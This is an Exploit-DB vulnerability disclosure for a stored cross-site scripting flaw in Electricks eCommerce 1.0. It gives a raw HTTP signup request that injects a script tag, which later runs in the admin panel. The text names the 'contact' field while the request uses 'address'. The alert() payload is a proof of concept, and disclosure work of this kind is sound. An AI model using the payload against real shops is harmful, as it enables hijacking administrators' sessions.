Electricks eCommerce 1.0 - Persistent Cross-Site Scripting

EDB-ID:

45857

CVE:

N/A


Platform:

PHP

Published:

2018-11-14

# Exploit Title: Electricks eCommerce 1.0 - Cross-Site Scripting
# Date: 2018-11-12
# Exploit Author: Nawaf Alkeraithe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/_billyblue/electricks.zip
# Version: 1.0

When a user signs up for an account on the following url:
Electricks-shop/pages/user_signup.php

The contact info input field isn't validated before displaying it to the
admin control panel page where the script will be executed.

Admin Control Panel could be found here:
/Electricks-shop/pages/admin_panel.php

For testing you could register as an admin here:
/Electricks-shop/pages/admin_signup.php

POST /Electricks/Electricks/Electricks-shop/pages/user_signup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/Electricks/Electricks/Electricks-shop/pages/user_signup.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
Cookie: PHPSESSID=f7is0t729t957ec7hbfud4oe98
Connection: close
Upgrade-Insecure-Requests: 1

firstname=Nawaf&middlename=test&lastname=Alkeraithe&email=nalkeraithe%
40gmail.com
&address=%3Cscript%3Ealert%28%22Stored+XSS%22%29%3C%2Fscript%3E&contact=nawaf&username=testme&password=tesetme&submit=